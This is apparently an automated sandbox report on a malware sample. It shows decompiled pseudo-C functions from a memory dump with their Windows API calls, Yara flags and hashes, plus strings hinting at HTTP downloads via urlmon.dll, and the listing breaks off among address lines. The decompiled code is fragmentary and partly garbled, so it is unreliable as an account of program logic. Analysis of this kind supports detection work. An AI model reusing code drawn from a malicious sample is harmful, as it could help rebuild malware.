                                                                                                                                                  Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 42%
                                                                                                                                                  			E004082F0(void* __edx, void* __eflags, intOrPtr _a4, long _a8) {
				char _v3;
				char _v67;
				char _v68;
				intOrPtr* _t16;
				int _t17;
				long _t24;
				intOrPtr* _t28;
				void* _t33;

				_t33 = __eflags;
				_push(0x3f);
				_push(0);
				 *((intOrPtr*)( &_v67 - 0x3a)) =  *((intOrPtr*)( &_v67 - 0x3a)) + __edx;
				asm("rol byte [eax], 0xe8");
				 *(__edx + 3) =  *(__edx + 3) >> 0x51;
				E0041C3F0();
				_t16 = E00414E10(_a4 + 0x1c, E0040ACC0(_t33, _a4 + 0x1c,  &_v68), 0, 0, 0xc4e7b6d6);
				_t28 = _t16;
				if(_t28 != 0) {
					_t24 = _a8;
					_t17 = PostThreadMessageW(_t24, 0x111, 0, 0); // executed
					_t35 = _t17;
					if(_t17 == 0) {
						_t17 =  *_t28(_t24, 0x8003,  &_v3 + (E0040A450(_t35, 1, 8) & 0x000000ff) - 0x40, _t17);
					}
					return _t17;
				}
				return _t16;
			}











                                                                                                                                                  0x004082f0
                                                                                                                                                  0x004082f7
                                                                                                                                                  0x004082fc
                                                                                                                                                  0x004082fd
                                                                                                                                                  0x00408301
                                                                                                                                                  0x0040830a
                                                                                                                                                  0x0040830e
                                                                                                                                                  0x0040832e
                                                                                                                                                  0x00408333
                                                                                                                                                  0x0040833a
                                                                                                                                                  0x0040833d
                                                                                                                                                  0x0040834a
                                                                                                                                                  0x0040834c
                                                                                                                                                  0x0040834e
                                                                                                                                                  0x0040836b
                                                                                                                                                  0x0040836b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040836d
                                                                                                                                                  0x00408372

                                                                                                                                                  APIs
                                                                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                  • Opcode ID: b9b79d427e30a74c20ea09e4d7148b624c3393b461da0744b498f80ec6a4bdbd
                                                                                                                                                  • Instruction ID: 7ca1aeaa7978e6d3a4d0f1b4208387e2518013786dff53ee4b69e84d93d23419
                                                                                                                                                  • Opcode Fuzzy Hash: b9b79d427e30a74c20ea09e4d7148b624c3393b461da0744b498f80ec6a4bdbd
                                                                                                                                                  • Instruction Fuzzy Hash: 7301AC31A803187BE720A6959C43FFF775C6B40F54F05411DFF04BA1C1D6A9691546FA
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 004082B4, Relevance: 1.6, APIs: 1, Instructions: 53threadwindowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 41%
                                                                                                                                                  			E004082B4(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
				int _t21;
				long _t33;
				int _t38;
				intOrPtr* _t40;
				void* _t42;
				void* _t43;

				asm("lahf");
				if(__eflags > 0) {
					 *((intOrPtr*)(__eax - 0x3a)) =  *((intOrPtr*)(__eax - 0x3a)) + __edx;
					_t43 = _t42 + 1;
					asm("rol byte [eax], 0xe8");
					 *(__edx + 3) =  *(__edx + 3) >> 0x51;
					E0041C3F0();
					_t21 = E00414E10( *((intOrPtr*)(_t43 + 8)) + 0x1c, E0040ACC0(__eflags,  *((intOrPtr*)(_t43 + 8)) + 0x1c, _t43 - 0x40), 0, 0, 0xc4e7b6d6);
					_t38 = _t21;
					__eflags = _t38;
					if(_t38 != 0) {
						_t33 =  *(_t43 + 0xc);
						_t21 = PostThreadMessageW(_t33, 0x111, 0, 0); // executed
						__eflags = _t21;
						if(__eflags == 0) {
							_t21 =  *_t38(_t33, 0x8003, _t43 + (E0040A450(__eflags, 1, 8) & 0x000000ff) - 0x40, _t21);
						}
					}
					return _t21;
				} else {
					_push(0x11c6f95e);
					asm("adc eax, ebp");
					asm("lds ebp, [edi]");
					 *__eax =  *__eax + __eax;
					_t40 = __eax;
					return E0041B140(__ecx) + _t40 + 0x1000;
				}
			}









                                                                                                                                                  0x004082b4
                                                                                                                                                  0x004082b5
                                                                                                                                                  0x004082fd
                                                                                                                                                  0x00408300
                                                                                                                                                  0x00408301
                                                                                                                                                  0x0040830a
                                                                                                                                                  0x0040830e
                                                                                                                                                  0x0040832e
                                                                                                                                                  0x00408333
                                                                                                                                                  0x00408338
                                                                                                                                                  0x0040833a
                                                                                                                                                  0x0040833d
                                                                                                                                                  0x0040834a
                                                                                                                                                  0x0040834c
                                                                                                                                                  0x0040834e
                                                                                                                                                  0x0040836b
                                                                                                                                                  0x0040836b
                                                                                                                                                  0x0040836d
                                                                                                                                                  0x00408372
                                                                                                                                                  0x004082b7
                                                                                                                                                  0x004082c1
                                                                                                                                                  0x004082c5
                                                                                                                                                  0x004082c7
                                                                                                                                                  0x004082c9
                                                                                                                                                  0x004082ce
                                                                                                                                                  0x004082dd
                                                                                                                                                  0x004082dd

                                                                                                                                                  APIs
                                                                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                  • Opcode ID: 65eb7dd41664316029f9a1a0a53ddf4b21b082d6d66c9e7afbccc8fe92b8de3b
                                                                                                                                                  • Instruction ID: d48ca81efc16e9748d7ccb43bdd4a35d2d56e06922ad4484a4080720d69b134b
                                                                                                                                                  • Opcode Fuzzy Hash: 65eb7dd41664316029f9a1a0a53ddf4b21b082d6d66c9e7afbccc8fe92b8de3b
                                                                                                                                                  • Instruction Fuzzy Hash: 72014C317407543AE71166685D43FFF7B14AF81B14F0982AEFE44BE1C3C6E9180642E9
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0041A052, Relevance: 1.5, APIs: 1, Instructions: 25memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 53%
                                                                                                                                                  			E0041A052(void* __eax, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t12;
				void* _t18;

				asm("rcl ecx, cl");
				asm("rep insb");
				asm("rol ebx, cl");
				_t9 = _a4;
				_t3 = _t9 + 0xc74; // 0xc74
				E0041A950(_t18, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t12 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t12;
			}





                                                                                                                                                  0x0041a057
                                                                                                                                                  0x0041a059
                                                                                                                                                  0x0041a05d
                                                                                                                                                  0x0041a063
                                                                                                                                                  0x0041a06f
                                                                                                                                                  0x0041a077
                                                                                                                                                  0x0041a08d
                                                                                                                                                  0x0041a091

                                                                                                                                                  APIs
                                                                                                                                                  • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                  • Opcode ID: e6818b2e1f97fe3368e3b8431b8da1fa1ea91d2864a2d3779e11874247444e65
                                                                                                                                                  • Instruction ID: 2c97211f60695eaf0afd548d493c0fa8256eb5ca2da6a4da6b64e692b9e06fa3
                                                                                                                                                  • Opcode Fuzzy Hash: e6818b2e1f97fe3368e3b8431b8da1fa1ea91d2864a2d3779e11874247444e65
                                                                                                                                                  • Instruction Fuzzy Hash: 2FE068B80003454FDB04EE38C4D24673B84EF802207008A8FEC5943202C124C81987A1
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0041A060, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0041A060(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A950(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                                                  0x0041a06f
                                                                                                                                                  0x0041a077
                                                                                                                                                  0x0041a08d
                                                                                                                                                  0x0041a091

                                                                                                                                                  APIs
                                                                                                                                                  • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                  • Instruction ID: 52797000195eaed384c72aa9dcce9225c0ea881c405841437723114bb70c3a82
                                                                                                                                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                  • Instruction Fuzzy Hash: AEE012B1210208ABDB18EF99CC49EA777ACAF88760F018559BA185B242C630E9108AB0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0041A1C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0041A1C0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041A950(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                                                  0x0041a1da
                                                                                                                                                  0x0041a1f0
                                                                                                                                                  0x0041a1f4

                                                                                                                                                  APIs
                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3899507212-0
                                                                                                                                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                  • Instruction ID: 2f72ad50c13f3bcf2c9af244d49b542148f264c451808f1d297bb805e18cb808
                                                                                                                                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                  • Instruction Fuzzy Hash: CDE01AB12002086BDB10DF49CC85EE737ADAF88650F018555BA0C57241C934E8508BF5
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0041A095, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                  			E0041A095(intOrPtr _a4, int _a8) {
				void* _t13;

				asm("invalid");
				_t7 = _a4;
				E0041A950(_t13, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t7 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                                                                                                  0x0041a09d
                                                                                                                                                  0x0041a0a3
                                                                                                                                                  0x0041a0ba
                                                                                                                                                  0x0041a0c8

                                                                                                                                                  APIs
                                                                                                                                                  • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A0C8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                                  • Opcode ID: a8056092284fd02524644ebf374f23c095ed5da5ffe8f5e4d983275d848f4a59
                                                                                                                                                  • Instruction ID: 3d5f5d4bedbb88bf5e9f9553445ff45a8df491e82a87483fb3bdd8882b899343
                                                                                                                                                  • Opcode Fuzzy Hash: a8056092284fd02524644ebf374f23c095ed5da5ffe8f5e4d983275d848f4a59
                                                                                                                                                  • Instruction Fuzzy Hash: 94E046712002046BC220DF98CC96FD73BA8EF09750F018458BA285F241C530AA01CAA1
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0041A0A0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0041A0A0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041A950(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                                                                                                  0x0041a0a3
                                                                                                                                                  0x0041a0ba
                                                                                                                                                  0x0041a0c8

                                                                                                                                                  APIs
                                                                                                                                                  • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A0C8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                                  • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                  • Instruction ID: 12fe1e20a4fde289fa2c932464272cdbd0b6c77391ac3b13e7111125b87f0676
                                                                                                                                                  • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                  • Instruction Fuzzy Hash: 14D012716102147BD620DB99CC85FD7779CDF48760F018465BA5C5B241C531BA1086E1
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 00417295, Relevance: 6.3, Strings: 5, Instructions: 80COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Us$: $er-A$gent$urlmon.dll
                                                                                                                                                  • API String ID: 0-1367105278
                                                                                                                                                  • Opcode ID: 35fac8c1d5d94c43bb07b3293f3e44cc489cfee6b17c5f639bc70e82c617b4eb
                                                                                                                                                  • Instruction ID: 64cd22ab9ce93dd56005a1350cd3da3bb9b65097de0912efc11b5753ae22b265
                                                                                                                                                  • Opcode Fuzzy Hash: 35fac8c1d5d94c43bb07b3293f3e44cc489cfee6b17c5f639bc70e82c617b4eb
                                                                                                                                                  • Instruction Fuzzy Hash: 26115472E052099AEB109E91AC02BFFBB74EF51714F10015AEC086B341D23D9942CBEE
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 004172A5, Relevance: .0, Instructions: 36COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4d5977a9876430e3fb2b3be42c66cb8de91bd652987bb57eace2de961647bb6b
                                                                                                                                                  • Instruction ID: 751b7d7bf6b9dafb26124e26ff56f5a28b0b219270f3804fe79b0d20a61cbf30
                                                                                                                                                  • Opcode Fuzzy Hash: 4d5977a9876430e3fb2b3be42c66cb8de91bd652987bb57eace2de961647bb6b
                                                                                                                                                  • Instruction Fuzzy Hash: DBE06836E4A1508A6B14ADA9B4050EBFF30E99B2647643297CC1C6B306C62AD851CACA
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 02558788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                                  			E02558788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E02558460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0253E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0255718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E02558460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0253E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0255718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E02558460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E02558460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E02558460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0253E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0253E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0255718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0253E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E02532340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0254E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0253E2A8(_t322,  &_v68, _v16);
								if(E02555553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0254E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0253E2A8(_t322,  &_v68, _t236);
								if(E02555553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0253E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0253E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0255718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0253E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E02532340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0254E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0253E2A8(_v12,  &_v68, _v16);
							if(E02555553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0254E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0253E2A8(_t322,  &_v68, _t269);
							if(E02555553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0253E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0253E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0255718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0253E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E02532340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0254E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0253E2A8(_v12,  &_v68, _v16);
						if(E02555553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0254E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0253E2A8(_t322,  &_v68, _t296);
						if(E02555553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0253E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0253E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                                                                                                                  0x02558788
                                                                                                                                                  0x02558788
                                                                                                                                                  0x02558791
                                                                                                                                                  0x02558794
                                                                                                                                                  0x02558798
                                                                                                                                                  0x0255879b
                                                                                                                                                  0x0255879e
                                                                                                                                                  0x025587a1
                                                                                                                                                  0x025587a4
                                                                                                                                                  0x025587a7
                                                                                                                                                  0x025587aa
                                                                                                                                                  0x025587af
                                                                                                                                                  0x025a1ad3
                                                                                                                                                  0x02558b0a
                                                                                                                                                  0x02558b0d
                                                                                                                                                  0x02558b13
                                                                                                                                                  0x02558b19
                                                                                                                                                  0x02558b1f
                                                                                                                                                  0x02558b25
                                                                                                                                                  0x02558b2b
                                                                                                                                                  0x02558b31
                                                                                                                                                  0x02558b37
                                                                                                                                                  0x02558b3d
                                                                                                                                                  0x02558b46
                                                                                                                                                  0x02558b46
                                                                                                                                                  0x025587c6
                                                                                                                                                  0x025587d0
                                                                                                                                                  0x025a1ae0
                                                                                                                                                  0x025a1ae6
                                                                                                                                                  0x025a1af8
                                                                                                                                                  0x025a1af8
                                                                                                                                                  0x025a1afd
                                                                                                                                                  0x025a1afe
                                                                                                                                                  0x025a1b01
                                                                                                                                                  0x025a1b06
                                                                                                                                                  0x025a1b06
                                                                                                                                                  0x025587d6
                                                                                                                                                  0x025587f2
                                                                                                                                                  0x025587f7
                                                                                                                                                  0x02558807
                                                                                                                                                  0x0255880a
                                                                                                                                                  0x0255880f
                                                                                                                                                  0x02558810
                                                                                                                                                  0x02558813
                                                                                                                                                  0x02558818
                                                                                                                                                  0x02558818
                                                                                                                                                  0x0255882c
                                                                                                                                                  0x02558831
                                                                                                                                                  0x02558838
                                                                                                                                                  0x02558908
                                                                                                                                                  0x02558920
                                                                                                                                                  0x025589f0
                                                                                                                                                  0x02558a08
                                                                                                                                                  0x02558af6
                                                                                                                                                  0x02558af6
                                                                                                                                                  0x02558af8
                                                                                                                                                  0x02558afb
                                                                                                                                                  0x025a1beb
                                                                                                                                                  0x025a1beb
                                                                                                                                                  0x02558b04
                                                                                                                                                  0x025a1bf8
                                                                                                                                                  0x025a1c0e
                                                                                                                                                  0x025a1c13
                                                                                                                                                  0x025a1c16
                                                                                                                                                  0x025a1c16
                                                                                                                                                  0x025a1bf8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02558b04
                                                                                                                                                  0x02558a0e
                                                                                                                                                  0x02558a11
                                                                                                                                                  0x02558a14
                                                                                                                                                  0x02558a15
                                                                                                                                                  0x02558a18
                                                                                                                                                  0x02558a22
                                                                                                                                                  0x02558b59
                                                                                                                                                  0x02558a28
                                                                                                                                                  0x02558a3c
                                                                                                                                                  0x02558a3c
                                                                                                                                                  0x02558a42
                                                                                                                                                  0x025a1bb0
                                                                                                                                                  0x025a1b11
                                                                                                                                                  0x025a1b11
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02558a48
                                                                                                                                                  0x02558a51
                                                                                                                                                  0x02558a5b
                                                                                                                                                  0x02558a5e
                                                                                                                                                  0x02558a61
                                                                                                                                                  0x02558a69
                                                                                                                                                  0x02558a69
                                                                                                                                                  0x02558a6d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02558a74
                                                                                                                                                  0x02558a7c
                                                                                                                                                  0x02558a7d
                                                                                                                                                  0x02558a91
                                                                                                                                                  0x02558a93
                                                                                                                                                  0x02558a93
                                                                                                                                                  0x02558a98
                                                                                                                                                  0x02558a9b
                                                                                                                                                  0x02558aa1
                                                                                                                                                  0x02558aa1
                                                                                                                                                  0x02558aa4
                                                                                                                                                  0x02558aaa
                                                                                                                                                  0x02558ab1
                                                                                                                                                  0x02558ac5
                                                                                                                                                  0x02558ac7
                                                                                                                                                  0x02558ac7
                                                                                                                                                  0x02558ac5
                                                                                                                                                  0x02558ace
                                                                                                                                                  0x025a1bc9
                                                                                                                                                  0x025a1bce
                                                                                                                                                  0x025a1bd2
                                                                                                                                                  0x025a1bd2
                                                                                                                                                  0x02558ad8
                                                                                                                                                  0x02558aeb
                                                                                                                                                  0x02558aeb
                                                                                                                                                  0x02558af0
                                                                                                                                                  0x02558af4
                                                                                                                                                  0x00000000
